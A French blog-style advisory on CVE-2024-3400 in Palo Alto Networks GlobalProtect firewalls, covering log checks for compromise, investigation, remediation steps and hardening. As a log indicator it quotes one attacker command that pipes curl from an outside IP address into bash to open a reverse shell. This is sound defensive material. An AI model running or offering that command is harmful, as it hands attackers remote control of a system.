La CVE-2024-3400 publiée le 12-04-2024 affecte TOUS les NGFW Palo Alto Networks ayant du GlobalProtect (Portail seul, Gateway seule ou les deux) actif. Toutes les versions sont concernées. Un attaquant utilisant cette vulnérabilité peut gagner un accès root sur votre NGFW et exécuter du code malicieux.
Comment savoir si je suis compromis ?
Voici les étapes à suivre :
- En SSH sur le Palo Alto Networks, utilisez la commande
« grep pattern "failed to unmarshal session(.\+.\/" mp-log gpsvc.log* » - Recherchez des éléments ressemblant à
- Traductions des commandes en base64
Par exemple établissement d'un tunnel de C&C :
C='curl -Ns telnet://216.250.118.219:5000';$C </dev/null 2>&1|bash 2>&1|$C >/dev/null
Investigations
Si des commandes ressemblant à celles ci-dessus sont trouvées (reverse-proxy) :
- Notez les adresses IP, Ports et Timestamp des compromissions.
- Recherchez sur le Firewall les connexions vers ces adresses IP et Ports.
- Recherchez sur des outils tiers les mêmes éléments pour savoir ce qui a été fait. Indice de compromission.
- Corrélez vos logs de firewall avec ceux de votre EDR (Endpoint Detection and Response) et tous les outils à votre disposition.
Remédiation
- Générez un Tech Support File du boitier. Si vous avez un cluster, upgradez le NGFW passif dans une bonne version puis basculez vers celui-ci.
- Sauvegardez la running conf + device state
- Factory Reset
- Restauration du device state
- Mise à jour du boitier dans une version validée (PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3, et toutes les version suivantes)
- Mise en place du content-update 8836-8695 ou supérieur
- Restauration des sauvegardes
Pour aller plus loin
- Changement des mots de passe des comptes locaux
- Changement des preshared keys VPN
- Rotation des certificats
- Amélioration de la sécurité du NGFW :
-
-
-
-
-
- Règles de sécurité par application
- Profile d’analyse
- Blocage des pays d’origine
- Utilisation des EDLs
- Mise en place du profil TP avec les 3 signatures (threat IDS 95187, 95189, and 95191) en mode reset-srv (90 de licence gratuite disponible)
-
-
-
-
Lien vers les documentions Palo Alto Networks
https://security.paloaltonetworks.com/CVE-2024-3400
Articles similaires
La plateforme de sécurité Palo Alto Networks pour sécuriser les réseaux SCADA* (Systèmes d'acquisition et de contrôle des données).
Lire l'articleDonnées exposées, accès ouverts, non-conformité, mauvaise configuration… Le besoin de se protéger contre les vulnérabilités liées à la migration vers...
Lire l'articleLes attaques par ransomware peuvent donner aux victimes un sentiment d'impuissance. Nous avons vu les demandes d'extorsion augmenter de façon...
Lire l'article